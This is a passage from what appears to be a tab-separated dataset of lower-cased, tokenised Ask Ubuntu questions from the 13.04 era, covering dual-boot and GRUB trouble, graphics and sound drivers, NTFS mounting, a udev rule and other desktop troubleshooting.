windows again . so that 's my problem . i have the link for the first boot-repair 'installation ' right here : http : //paste.ubuntu.com/5631563/ . does anybody have an idea of what to do ? can i activate something that will make the computer asking me for which os i wan na use when i start up ( it did after the first boot-repair ) ? or ca n't i just make ubuntu my default ? update : in bios settings , i can choose between these : international cd/dvd rom drive usb diskette on key/usb hard disk usb cd/dvd rom drive notebook hard drive ( really think this is windows ) ! usb floppy ! network adaptor
290576	ca n't recover my desktop environment	good evening everyone , i am having problems recovering my desktop . before it came to this desktop without the taskbar at the top , and the sidebar . also the title bar for applications are gone . what happened is i tried to installed my nvidia driver without using the additionaldrivers application , but using the terminal . i downloaded the installer for my nvidia driver followed the instructions , which was first to disable the x server , i did it by changing the run-level . vim /etc/init/rc-sysinit.conf changed the value of `` env default_runlevel = 2 '' to 3 next was i disable the nouveau driver by adding this lines . blacklist nouveau options nouveau modeset=0 to the following file : /etc/modprobe.d/blacklist.conf using vim after that everything went wrong , my desktop did not went the way things i thought it would be so , i decided to uninstall the driver and undo the changes i did.. and this happened.. the reason why i tried to install the driver : because my systems keeps on saying my graphics driver is not well configured that i had to run on low graphics mode for one session even if it wo n't be just once . and also it keeps giving errors that my graphics is not well installed . hmp.. before everything else , my desktop was fine . i was looking for some ways to reset the default desktop unity which was unity reset but it gives out an error that the reset command was already deprecated and so i came to my last resort on posting a question in this forum so i can find a solution on how to fix my desktop environment . i 'm using the ubuntu 12.10 desktop version btw . i ca n't run the unity command in the terminal . it gives out errors that the process is not found and all the things that it is loading goes for an error and nothing . if definitely by chance i get things done and found the solution , i 'll post it .
290577	unable to boot usb install image 13.04	i 've tried creating a usb boot drive but it always fails with a message from syslinux and a boot : prompt . unknown keyword in configuration file file0 boot : i 've checked the md5sum of the iso - the iso is fine . this occurs with both the 12.04.2 and 13.04 images . both the images are the 64 bit variants . i have not tried the 32 bit variants . none of the computers have windows 8 installed ( vista / windows 7 ) . i 've tried multiple tools to write the iso to the usb disk ( unetbootin , lili , startup disk creater - but none of them work . some posts mentioned to edit the syslinux.cfg file - i could n't do that as it was a binary file ( started with file0 and then some binary ) i 've also tried multiple usb flash drives and none have worked . the drives work fine otherwise and one of them is brand new . hence i do n't think it is a problem with the usb pen drives either . i think it 's something to do with uefi - but not sure what . i intend to try the 32 bit versions to check if that is the case as i guess the 32 bit ones are not uefi ? i 'm not sure what 's wrong .
290582	problem with creating shorcuts in ubuntu	i am new to linux . i tried to create shorcuts in linux ubuntu but my terminal shows this message everytime . can anyone explain what is the problem . it says : gnome-desktop-item-edit : file : ///root/desktop does not have a .desktop or .directory suffix
290583	how to use ubuntu 13.04 with ati rv635 [ mobility radeon hd 3650 ] graphics card ?	i upgraded from ubuntu 12.10 to 13.04 on a laptop running an ati rv635 [ mobility radeon hd 3650 ] graphics card . after the update the screen was garbled . if i get into ubuntu via the ubuntu recovery console ( network enabled option ) i can log in but then see no unity or decorated windows . when i upgraded from 12.04 to 12.10 i had to follow the instructions at http : //www.ubuntuvibes.com/2012/10/how-to-install-amd-catalyst-legacy.html to use my display but these did n't work for 13.04 and i undid them . can someone please help me fix this display issue so i can use 13.04 ? the software center says the open source driver xserver-xorg-video-radeon is installed so i do n't know why that does n't appear to be working .
290584	how to stop nautilus from copying/deleting instead of moving on nfs mounted dir ?	i have an nfs mounted folder ( mounted via autofs ) . whenever i move files around inside the folder using mv , they are moved instantly ( as expected ) no matter how large they are . however , when using nautilus , i can see that it is actually copying the file then deleting the old one . i assume it does this because it is a network share . is there a way i can stop this behaviour ? it is a real pain for very large files . is there a reason i would want this behaviour ?
290590	multiple os 's , several drives , need a working boot manager	okay , so i have several drives with various operating systems on various partitions . the main drive is a 200gb sliced into a primary for ubuntu a swap and some storage . the other drives 2x350gb are similarly chopped up , on the 200gb boot drive , it loads to a boot manager and lists ubuntu and two instances of win 7 ( one from the 2nd drive and one on the 3rd drive ) . there is also a windows xp partition , which is not displayed in the boot manager . what i need is a boot on the 200gb with a boot manager that will allow me to select any of the available operating systems by selecting either the name or the partition sda1 ext4 sda2 extended sda5 swap sda3 fat32 sdb and sdc have xp , 7 and soon 8 and some other os variants . i simply want to be able to tell the boot manager which partition to boot from , just getting a blinking cursor when i select windows from the boot manager , even tho it seems to have detected it during install . i did not do the `` along side '' option , i just created a set of partitions on the first drive for linux , the other drives were resident in this machine and booting fine , now with the new linux drive booting first , there is some problem . perhaps there is a better boot manager to use ?
290594	virtual box not working after upgrade from 12.10 to 13.04	i had oracle virtual box installed with win 98 loaded into it . it was working fine when i had ubuntu 12.10 and recently i upgraded to ubuntu 13.04 . after that i am not able to start the win 98 os and getting an error stating `` kernel driver not installed ( rc=-1908 ) '' . please help in getting this fixed . thanks . regards pk
290606	quod libet tray icon missing in ubuntu 13.04	after upgrading to ubuntu 13.04 , the tray icon for quod libet is missing . how can i get it back ?
290608	can i run my bosto tablet on ubuntu ?	is it possible to run my bosto kingtee 14wa tablet on ubuntu ? i ca n't seem to find any drivers for it . any advice/help would be much appreciated .
290609	ubuntu 13.04 on 2013 15 '' macbook pro retina display with apple 27 '' thunderbolt display	i know that people have managed to get the mbp-retine working with ubuntu 13.04 , but has anyone been successful in getting to drive a thunderbolt display ? or is the led cinema display the only option ?
290611	add icons to top panel ubuntu 13.04	how can i add icons to the top panel like dropbox , mail , wi-fi , etc . i 'm using 13.04 . edit : the given answer is about what applications when installed make a panel icon and not how to add a custom one . thank you .
290612	no sound when upgrading to linux 3.9 kernel	i recently upgraded to the 3.9 linux kernel ( on ubuntu 13.04 ) and lost all sound at first , and then miraculously brought back sound to the speakers ( after playing a bit with alsamixer , but still no sound when plugging headphones .
290616	windows 8 problem , liveusb , bios = blackscreen	i bought a new laptop ( asus x201 ) and i wanted to install ubuntu as a dual boot or just ubuntu ( so delete win8 ) , and there are everywhere problems . it started that while booting win 8 i can not even access the bios menu . after researching there is only a so called `` uefi '' . i need to access the bios so i can use my external dvd drive for the ubuntu or other linux cds/dvd , but somehow it did not work i did some more research and find out that win 8 does not suppport ubuntu installer so i uninstalled windows and wiped the hard drive . as my external dvd drive is not working i followed the instruction to make a liveusb . i can access it while booting ad4 options are given try ubuntu install ubuntu oem install check disc for defect i tried all of them but nothing works . when i choose one of the 4 option nothing happens , just a black screen . i also can access the gnu grub but i do n't know what to do !
290617	configure ibus to generate `` à '' using compose + a + `	i would like to have ibus work like to corresponding system in os x . in order to get an `` à '' in a text field i want to make these steps : i press the compose key i press the a key ( an `` a '' appear in the text field with a yellow background ) ( a menu of possible accented `` a '' letters appears ) i press the ` key ( an `` à '' appears and the yellow background behind the character disappear ) ( the menu disappear and i am no longer in the `` composite mode '' and can continue writing text ) how can i configure ibus in precise 12.04 to get this result ?
290619	unity wo n't run after update to 13.04	first of all , i 'm pretty new in ubuntu so i do n't know everything.. but i 'm willing to learn ! today i updated my ubuntu to 13.04 . everything seemed fine . i used my pc for an hour and shut it down . the next time i tried to boot it up , unity wo n't start . i tried to start unity by terminal but it gives me several errors : xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 i started searching and tried to remove and install the nvidia drivers by using this : sudo apt-get remove nvidia-current sudo apt-get install nvidia-current i rebooted but still unity wo n't start up . i tried several things found here on askubuntu , but it seems nothing is working . yet i found something to test if unity is supported : /usr/lib/nux/unity_support_test -p which gave me this output : xlib : extension `` glx '' missing on display `` :0.0 '' . error : glx is not available on the system some information about my nvidia card ( using : lspci | grep vga ) : 00:0d.0 vga compatible controller : nvidia corporation c61 [ geforce 6150se nforce 430 ] ( rev a2 ) 02:00.0 vga compatible controller : nvidia corporation g98 [ geforce 8400 gs rev . 2 ] ( rev a1 ) is there anyone who has had this problem as well and solved it ? thanks in advance , lisanne
290620	ubuntu 13.10 without sound in flashvideos at firefox/chromiun	hey guys my new ubuntu is no sound when i play flash videos . but in my players sound is fine . any suggestion ? sorry for my bad english cheers from brazil : )
290622	turn screen off when no motion in front of webcamera	is it possible to automatic turn screen off when there is no motion detected in front of webcamera for x minutes ? can i use sudo service motion start and xset dpms force on/off somehow together ?
290623	installing ubuntu to a specific disk drive alongside windows 7 on separate disk	i have deleted an entire disk drive ( 120 gb ssd ) for ubuntu to be installed on . however , when i install ubuntu 13.04 from dvd , it never prompts me as to which disk drive to install on . unfortunately , something is failing at the very end , so i have no idea where ubuntu is trying to install , but i 'd at least like to make sure it is installing to the completely unallocated disk drive .
290626	desktop icons disappear when using wallpaper plugin	when i enable wallpaper compiz plugin all icons disappear from desktop . how can i fix that ?
290628	how to make a script passing his pid to another running script	i have a script which is the main one and this script open a new terminal and execute another script so what i want is to pass the pid of the second script to the first script the main script # ! /bin/bash gnome-terminal -e `` /home/ ... ... ./script.sh '' script.sh # ! /bin/bash pid= $ $ i want to pass the variable called pid to the main script regards
290629	how can i know which port am i connected to ?	i have a gps connected to a ( serial to usb connector ) to comm6 . i want to read data from the gps . i guess i need to know the ttysn that it is connected to so i could read the date from it . how could i know which ttys am i using ? thanks alot in advance
290630	problem to enter in ntfs partition `` the disk contains an unclean file system ''	sorry if this question is already solved . i changed my operating system , from windows to linux ubuntu 13.04 . i have 2 partitions : c : ( system ) and m : it 's ntfs ; there i have my information , music , photos . when i want to access the disk to use the information , i ca n't get past this error : error mounting /dev/sda2 at /media/love/mis archiivos : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/love/mis archiivos '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . clarification : i do n't have 2 oses . i only have linux installed .
290644	wo n't load windows 8 from grub 2.0 ( ubuntu 13.04 )	just installed dual-boot ubuntu 13.04 on my self-built windows 8 pro pc , and after the installation i restarted , and once i was prompted with grub 2.0 i tried to boot off of windows 8 , and a few seconds after i selected the os it would restart my computer entirely . i am clueless when it comes to linux entirely as i am a gamer and video editor it is not the best option for my needs , but all of my friends have been telling me to dual-boot so i did . i am very afraid of loosing all of my data on my hard drive and such because a large portion of my job is done on that hard drive . i installed windows 8 first , and i installed ubuntu on my 80 gigabyte hard disk drive . i would just like to know how to either uninstall ubuntu and grub entirely or just boot with windows 8 normally . system information : system processor : intel core duo 6700 2.66 ghz system dram : 8gb ddr2 dram graphics processor : sapphire amd 5570 1gb gddr3 motherboard : abit ab9 pro storage : 1tb western digital caviar green , 500gb , 80gb
290655	how to preview contents of an online archive before download	how can i preview contents of an archive , ( .zip , .tar , .rar etc ) which is available in internet , before downloading it ? eg : uc browser in phone can preview .zip , .tar etc file
290657	syncing laptop and desktop files over college wifi ?	are there any tools that can efficiently do so while not compromising the security of my files ? will using such a tool place a burden on the college 's wifi network and slow down the network speed or hog bandwidth that others also utilize ? if this network syncing of files does place unncessary and/or noticeable burden on the college 's network , what of the possibility of instantly syncing files when i connect the two computers with usb ? ideally , the methods should be automatic after a one-time initial configuration so as to require low if any maintenance on my part .
290658	no network interfaces detected when installing ubuntu server on mac mini	i have a new mac mini ( macmini6,1 late 2012 ) that i would like to install ubuntu server 13.04 ( ubuntu-13.04-server-amd64+mac.iso ) on . but it seems like ubuntu server is n't able to detect my network interface , because i get the message : no network interfaces detected how can i fix this issue ? is there any module or driver that i can add for this ? i have now tried to install ubuntu server with the build-essentials package and downloaded source to the tg3-driver as suggested in the answers . but when compiling ( with the make command ) i get errors : ... cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/jonas/tg3-3.129d/tg3.o ] error 1 make [ 1 ] : *** [ _module_/home/jonas/tg3-3.129d ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-19-generic` make : *** [ default ] error 2 any suggestions ?
290660	files on web server can be found without extensions	i have a page about.php . i can access this page by either example.com/about.php or example.com/about and even example.com/about/ . the latter does something strange . it treats the about.php ( which is in public_html ) as if it is index.php inside an about folder . i know this because when i open it that way the images do n't display ( as if the images are in an upper folder ) i do have to set up some rules for htaccess but it is no the htaccess file because there is n't one yet . what else can be causing this ?
290662	how can i install syspeek in ubuntu 13.04 ?	syspeek is a system monitor indicator that displays cpu usage , memory usage , swap usage , disk usage and network traffic . is there a version of syspeek for ubuntu 13.04 ?
290664	command to generate all aplications from startup in a txt file	i need a command to generate the list of all applications and programs which start when i turn on my laptop and login in ubuntu 12.04 . i want to make a .txt file with them . thanks .
290668	how to share a folder between kvm host and guest using virt-manager ?	for some time now , i 've been using virt-manager to manage my virtual machines . when i want to copy a file from the host to the vm , i have been using scp to copy via ssh over the network . this is kind of tedious , and there must be a way to share a folder similar to virtualbox . so how can i best share a folder between a kvm host and guest using virt-manager ?
290670	ubuntu on samsung series 7 chronos . advice please ?	i just bought a refurbished samsung series 7 ( np700z5c ) . i got a great deal on it from best buy so that 's why i went with it . my intention all along has been to remove windows 8 completely and install ubuntu , but now that my laptop has arrived and i 've started to look in to the process more deeply i see that there are a lot of problems with this range of laptops firmware , particularly with respect to linux ( is it safe to install ubuntu 64 bit 12.10 in efi mode on samsung series 7 windows 8 laptop ? ) . so my thought is that i 'll install as a dual boot , reserving a small region of hard drive space for windows 8 . i assume that once samsung update the firmware the fix will be made available via an update through windows . if the laptop 'bricks ' anytime in the next 90 days then i can return the laptop under it 's warranty , and hopefully the fix will come before then . ( an aside : i spoke to customer services at best buy , they said that they were unsure if installing ubuntu would violate the warranty , and that i should call samsung to check . samsung told me that it would not , so long as i return the laptop to its original conditions before returning it . if the computer bricks then i would n't be able to do that , but then there 's no way they could tell what i 'd done with it anyway . ) so i wanted to ask advice from the larger community , because i 'm new to ubuntu and know very little about the internal workings of computers ; firmware , bios , etc . does my plan seem sensible , or have i missed something that 's going to screw me over ? even though i got a good deal the money was a huge investment for me . my second option is to return the laptop and get a system76 machine , but a similar spec machine will set me back half as much again as i paid for this samsung . perhaps people could suggest whether they think that would be worth it . i 'd really like my new laptop to last the 6 years my last one did .
290675	how to enable php on lampp ?	i installed lampp a couple of weeks ago . everything works fine when it comes to html files , but when i try to open a php file , the browser asks me where to download it . : / i tried with my php files , i also made a test.php wich calls phpinfo ( ) with no results . localhost/xampp and localhost/ also asks me for download location . i added the following line to httpd.conf : addtype application/x-httpd-php .php .php3 .php4 .php5 but still no results . what could be wrong ? thanks for your help !
290676	hello , i have windows xp and i have install ubuntu in a second usb harddisk ( 120gb )	i have windows xp and i have install ubuntu in a second usb harddisk ( 120gb ) with `` wubi '' , in this harddisk i have and windows xp files , after 2 years i see in update ubuntu this : `` no space left on device '' ... version ubuntu : no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise what can i do ? c
290681	error unknown filesystem : grub rescue ?	i had a dual boot system for windows 7 and linux 10.10 . i am new to linux and hadnt upgraded it before ir reached its end-of-life . so i decided to delete the partition in which linux was installed and in the same session downloaded the latest linux version 12.04 using wubi in windows . when i rebooted my computer , i get this error : '' unknown filesystem '' grub rescue > i have seen other threads that involve making a livecd . as it turns out i have already installed the latest linux , so is there a way to get my pc to boot to either 12.04 linux or windows 7 without making a live cd
290689	no nvidia/nouveau modules loaded , but sytem working fine ?	okay , so right now , i have installed both nvidia drivers and bumblebee and am getting all the necessary functions working - battery conservation , higher fps etc ... . but when i try lsmod | grep nvidia* or lsmod | grep nouveau or lsmod | grep bumblebee i am not getting any working modules of these types . is something missing , because my synaptics shows the drivers installed and am pretty much sure the system is working fine . also would an kernel upgrade break my system ? or is there someway to do it without breaking it ? hey guys , is this even possible ?
290693	sound not working after suspend macbook7,1 ubuntu 13.04	in sound settings , i see only a dummy output option . was working prior to last ubuntu updates . the only way i can restore it is by booting back into osx and then rebooting to ubuntu . rebooting ubuntu does n't work to fix it . i 'd like a better way : ) lspci -v | grep -a7 -i `` audio '' 00:08.0 audio device : nvidia corporation mcp89 high definition audio ( rev a2 ) subsystem : nvidia corporation device cb89 flags : bus master , 66mhz , fast devsel , latency 0 , irq 23 memory at d3280000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : kernel driver in use : snd_hda_intel
290694	xev not recognizing up arrow key	i 've been having problems with my keyboard lately . i 'm using aspire s7 ultrabook . though the arrow keys and del key suddenly went crazy . i press the up key , nothing happens . i press the right key , nothing happens . i press the down key , touchpad off sign appears , though touch pad stays on . i press the del key , touchpad on sign appears , though touch pad stays off ( if it 's off ) . i have tried remaping the keys but since the keycodes are n't showing up on xev i 'm having a bit of trouble . anyone had this trouble before ? how can i fix it ?
290695	left ctrl key not working in ubuntu 13.04	i have just upgraded to ubuntu 13.04 and the left ctrl key has stopped working . how would i go about diagnosing the problem ? i had to downgrade my x server to enabled legacy graphics card support , but everything else seems to be fine . edit : xev output for left ctrl : keymapnotify event , serial 38 , synthetic no , window 0x0 , keys : 4294967235 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 xev output for right ctrl : keyrelease event , serial 38 , synthetic no , window 0x3e00001 , root 0xc3 , subw 0x0 , time 10191367 , ( -206,519 ) , root : ( 827,656 ) , state 0x14 , keycode 105 ( keysym 0xffe4 , control_r ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false
290698	tried ntfs format in terminal but says internal error	i have installed ubuntu 13.04 with linux kernel 3.8 which has ntfs-3g package but again asks to install it , when tried the terminal does not respond ! as i am new to ask ubuntu i 'm not allowed to post the links else i would do it . http : //tripleasolutions.freeiz.com/456.png
290703	which ubuntu iso should i burn for my system ?	when i am downloading ubuntu to burn it and install on a partition , i keep getting the amd version ( ubuntu-12.04.2-desktop-amd64.iso ) . i do n't have an amd processor but i have intel i7 3740qm . on the download page i just see one link that 's interesting ( 12.04 since it 's stable ) , no option for intel processors . should i still use this file ? i found another iso file earlier but i 'm not sure from there . it 's filename is ubuntu-12.04.2-desktop-i386.iso and i burned a cd from it . the reason i think it may be wrong is that when i 'm booting from it i get the following message : ata_id [ 334 ] : hdio_get_identity failed for â´/dev/sdcâ´ : invalid argument the boot stops there and i need to go reconfigure bios or eject the cd to boot again . i figured there 's something wrong with my cd so i 'll burn another one so that 's why i want to be sure i 'm using the right iso to burn . in this questions there 's someone getting the same or similar error message . answers suggests that the message can be ignored - but i do n't get further , that message is shown and the boot is not proceeding .
290705	after updating to xubuntu 13.04 , brasero will not work , can this be remedied ?	after updating to xubuntu 13.04 , brasero will not work , does anyone else have this problem and can it be solved ?
290706	gnome ubuntu 13.04 notifications issue	when selecting notifications in the lower right hand corner in a newly upgraded gnome shell 3.8 from 3.6 , nothing happens . anyway to correct this issue ? otherwise the upgrade to 3.8 went surprisingly well . thanks .
290707	amd/dti radeo hd 5450 supported ?	i have a xfx hd 5450 based card i would like to install on my desktop running ubuntu 13.04 . the opensource drive does n't implement 3d acceleration , making it impractical for unity/compiz . i followed the ( very good ) instructions in this link to install the latest catalyst http : //askubuntu.com/a/286775/35775 . after reboot , the system freezes on the greeting screen . it does n't even give me a chance to open a console . the only document solution i did n't try was the `` sudo aticonfig -- tls=0 '' before i go again through the whole marathon of card and drive installation , is there any evidence of a working hd 5450 out there ?
290716	editing metadata alac files in rhythmbox	i do n't seem to be able to edit the metadata of alac ( apple lossless ) files in rhythmbox . is this even possible or should i use another musicplayer ( like clementine or banshee , who both can handle the task ) to do this ( as i 'm doing yet ) ?
290717	how to share a vpn internet connection	follow my scenario : router internet without possibility to configure a vpn laptop ubuntu with wifi and ethernet . configured on it a vpn . other device where i can not install a vpn . i would like to use as gateway laptop 2 and his vpn tunnel for device 3 . how to configure in ubuntu a vpn and use it as gateway for others device ? thanks
290719	when shutdown with my 13.04 with button it does not go off	when shut down on button it does not go off , but ask again do you want to shut down if yes it freezes up to who knows when , if i type cancel shut down is delayed until further i do the same , but if i type suspend from roll down many in upper right corner if goes off ? ! i have hp probook , i3 3210 , 4gb , bought few days ago and i have deleted suse to install 13.04 . jovan
290721	launcher and dash hide after update video card	i currently have ubuntu 13.04 installed . and then i installed nvidia drivers from the additional drivers window . but after installing , the launcher and dash has gone.. then i deleted the nvidia driver . but it did not fix my problem . my graphics card : nvidia gforce 9800gt .
290722	facebook notifications in ubuntu 13.04	which apps will give me facebook notifications in ubuntu 13.04
290724	what are ubuntu 10.04 lts system requirements ?	i have tried to install ubuntu 10.04 lts beside windows 7 on my laptop . specs : 2gb ram 32bit 2.10ghz 300gb hard disk core2 it used to make my laptop very hot . any suggestions please ?
290725	is it possible to direct system monitor output to a file ?	i want to save to a text file the cpu and memory usage real-time info displayed in gnome system monitor 3.6 . does anybody know if this is possible ? if so , how can it be done ? if it 's not possible with gnome system monitor another tool is fine , as long as it works . btw , i 'm not afraid to work with the terminal here : d
290726	how can i properly install the latest nvidia geforce drivers on 13.04 ? ( x64 )	i 'd like to install the latest and greatest straight from nvidia , but i get an error message saying i need to log out of an x environment or something . obviously using the default drivers does n't deliver the best results . what exactly can i do to install the latest drivers ? if it matters , i have a 2gb geforce gtx 660 ti .
290729	how do i turn on my bluetooth for my msi-1754 laptop ?	the fn key does n't work , and the s bar does n't show bluetooth . i looked in the devices , and there is n't anything for bluetooth . but supposedly there is supposed to be bluetooth .
290736	can i create a really universal usb drive ?	i have looked and looked over this forum and multiple other forums about the correct way to do this and i have not found a solid answer yet . i am trying to create an all in one bootable tech usb drive . i currently have 4 partitions on this 500 gb drive . 1 is windows 8 , 2 is ubuntu 13.04 , 3 is swap for ubuntu , and 4 i 'm calling bootable isos . this is what i want to happen . when i boot to the usb it goes to grub2 then from there i can go to win8 or ubuntu . so far all this works fine , however what i ca n't seem to get to work is i 'm wanting to add tons and i mean around 300 gbs worth of bootable isos , including hirens , bitdefender , erd , and anything else i can get my hands on . now i 've heard all that is possible , however i am also wanting to be able to put win8 , win7 , winvista , winxp , and pretty much anything else that i may possibly use at work , and be able to install them all from my usb . think pxe server , but from my usb . is all this possible . my first step was to install win8 and ubuntu side by side , and i got that done . my next step has been to get grub2 to boot to the .iso files on the 4th partition . any ideas , i 'm kinda new to all this ubuntu stuff , but i 'm always willing to learn . so break it down for me as best as possible so that i can actually learn for next time .
290737	software center closing issues	i used the ubuntu software center for the first time since i upgraded to 13.04 , and i 've notice that i ca n't close it with the `` x '' button on the top left of the screen . when i click it , the window behind it suddenly show up , then close . the only way i can close it is right clicking the icon on the dock . help would be appreciated , thanks !
290744	vlc is installed but does n't run properly	i 've had made a huge mistake by wiping out every vlc folder from ubuntu 12.04 . i tried to reinstall it , but it does n't work . i tried installing it by command line and it seems to work : however , when i run the vlc command , it says vlc is not installed . if i try to install it again , it tells me vlc is already at the latest version . now i ca n't run vlc any more and ca n't figure how to fix it . thanks in advance ! i ran these : sudo apt-get remove -f -- purge vlc vlc-data vlc-nox vlc-plugin-notify vlc-plugin-pulse and then these : sudo apt-get install -f vlc vlc-data vlc-nox vlc-plugin-notify vlc-plugin-pulse apparently everything gets back to normal . even the icons got back . now i finally am able to run vlc on the terminal and get some response . unfortunatey i still am not able to make it run properly , vlc does not open by any chance . this pops up : vlc media player 2.0.5 twoflower ( revision 2.0.5-0-g1661b7d ) the remote control interface was started . type 'help ' for help . however , not a single window opens .
290754	nautilus change search-on-type 3.6.3	i have recently upgraded to ubuntu 13.04 , and there are some slightly annoying things in nautilus 3.6.3 . before upgrading i usually did file managment mostly through typing and pressing enter , but in nauiltus 3.6.3 when i type it opens up a deep search , which is slow and not at all what i want . for instance if i type 'doc ' when on my home folder , it will take around 1 minute just to look through all the sub folders before actually selecting documents from my home folder . i just want it to have the old function of search only within the current folder when i type , or just selecting the one that starts with what i typed . is there a way to disable deep-searching and only search in the current directory when typing in nautilus 3.6.3 ? without downgrading nautilus . i do like the sub directory searching in nautilus 3.6.3 , but it is super slow compared to just searching the current directory .
290756	creating a new folder in nautilus	i must be missing something really obvious , but when in nautilus , how do i create a new folder if the window is full of other folders/files ? when ever i right click , only the context menu of a subfolder/file is given , as the window is full :
290758	how to change screen resolution in xubuntu 11.10 ?	i ca n't figure out how to change my screen resolution . can someone help me ?
290762	how to change ubuntu 12.04 64 bit to 32 bit without loosing data or changing settings	i accidentally installed ubuntu 12.04 64 bit on my 32 bit pc and already installed a lot of important things . how can i change it to 32 bit os without loosing data or settings ?
290764	how to start a playonlinux game windowed	i am using playonlinux 4.1.1 under ubuntu 13.04 the game i am trying to run is heroes of might and magic iii complete . it runs perfectly well in fullscreen mode , but i want to run it in windowed mode . is there any way to do that ? i tried adding -windows argument but it did n't work .
290765	ubuntu 13.04 ethernet upload speed very slow	just installed ubuntu 13.04 on my toshiba r840 laptop together with windows 7 . installation was a breeze . everything works fine . checked the speed on speedtest.net . surprisingly my ethernet upload speed is about 4 times slower than the same test done on my windows 7 and wireless on ubuntu . when i take it off the ethernet in ubuntu and use the wireless , wireless has a perfect speedtest . here are the results all to the same test server : windows 7 ethernet - up 83.11/down 39.21 ubuntu wifi - up 82.37/down 39.01 ubuntu ethernet - up 83.07/down 9.02 something is not right . the output of the ethtool : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full advertised pause frame use : no advertised auto-negotiation : yes speed : 1000mb/s duplex : full port : twisted pair phyad : 2 transceiver : internal auto-negotiation : on mdi-x : on supports wake-on : pumbg wake-on : g current message level : 0x00000007 ( 7 ) drv probe link link detected : yes
290772	13.04 - rhythmbox seeks through songs after resuming	about 20 % of the time , when i resume rhythmbox from a paused state it will seek forward an unspecified amount of time , anywhere from a few seconds to several tracks . it seeks at about 1min/sec . it seems to me as if it is trying to find an uncorrupted part to play , but the tracks work fine before pausing . gist of debug output after play key is pressed , the problem occurs , rhythmbox settles down , music is paused again , and rhythmbox is closed : https : //gist.github.com/sprakle/5518891 this is all done on a fresh install of ubuntu , it never happened on 12.04
290773	installing ubuntu 13.04 on samsung chromebook 550	is it possible to install ubuntu 13.04 and later releases on a chromebook 550 like you would on a windows laptop etc ? i 'm thinking of getting one of these chromebooks to do this and run it alongside chrome os or maybe replacing chrome os . thanks all !
290777	how to unite all files from several subfolders into one big folder ?	how can i copy all files , with different extensions , from several different subdirectories , into one main folder ?
290779	sound problem while gaming on hp pavilion dv4	i get a weird behavior with my volume every time i try to play a game with desmume or even if i try to play trine in steam . volume goes up and down and it does n't stop which makes gaming impossible . anyone has an idea to solve this ? i have an hp pavilion dv4 2161nr .
290786	my network disconnects and reconnects all the time	every few minutes my internet connection fails and then reconnects automatically , though the network indicator never changes . i can post some logs if needed , i just do n't know what , any help would be highly appreciated . while doing an infinite ping to google , i get stable ping ( 50-60 ms ) , but after a while the ping just stops and continues after the connection is back . i am using ubuntu 13.04 .
290795	why is this udev rule blocking ?	here is a rule from my /lib/udev/rules.d directory : subsystem== '' input '' , attrs { idvendor } == '' 045e '' , attrs { idproduct } == '' 008c '' , run+= '' /home/mikeknoop/scripts/udev-receiver.sh '' here is the simple contents of the udev-receiver.sh script : # ! /bin/bash echo `` udev-receiver init '' > > /var/log/external.log { sleep 5 ; echo `` done '' > > /var/log/external.log } & echo `` udev-receiver finish '' > > /var/log/external.log when i plug in my device , the output of external.log is as you would expect : udev-receiver init udev-receiver finish done however , i am also tailing the syslog /var/log/syslog and can see that even though i have forked the long-running sleep process , udev device initialization is blocking until after done shows up in my external.log file . the reason this is important is because i am trying to set some device properties via xinput but the device is n't listed via xinput list until the entire udev initialization is completed ( until after done shows up in external.log ) . according to the udev ( 7 ) - linux man page '' add a program to the list of programs to be executed for a specific device . this can only be used for very short running tasks . running an event process for a long period of time may block all further events for this or a dependent device . long running tasks need to be immediately detached from the event process itself . '' i am unable to reconcile the man page and the behavior that i am seeing . can anyone shed light or offer a better way to set properties via xinput when a device is inserted ? thanks !
290797	ati card ( radeon hd 5850 ) forced screensaver settings	i just installed an ati graphics ( radeon hd 5850 ) to my desktop swapping my nvidia gts250 . i noticed it turns off the output if idle for 2 minutes , even if i was running a video ! unless the mouse/keyboard do anything , it will not stay on . screensaver settings : none power settings : none before installing the official drivers from amd : yes after that : still yes i tried anything . and now i am turning for you to help . save e from this frustration please . thank you
290800	broadcom 4312 card . cant find any wireless network	i switched my computer over to ubuntu from windows , big mistake . i cant get my wireless to work . i scan wlan0 and a bunch of other things that i copied and pasted from the internet . i have no idea if my wireless card is working or not ? i tried to manually create the connection by typing in my routers ssid and wpa2 key , the little wireless icon in the upper right looked like it was looking for the router . no matter what i scan for in the terminal i get interface does not support scanning . any advice ? edit for grimpitch : 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) subsystem : dell wireless 1397 wlan mini-card [ 1028:000c ] flags : bus master , fast devsel , latency 0 , irq 17 memory at f69fc000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 58 ] vendor specific information : len=78 < ? > capabilities : [ e8 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ d0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 13c ] virtual channel capabilities : [ 160 ] device serial number 07-cf-5f-ff-ff-62-00-22 capabilities : [ 16c ] power budgeting < ? > kernel driver in use : wl output from iwconfig : eth0 no wireless extensions . eth1 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . lspci : 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 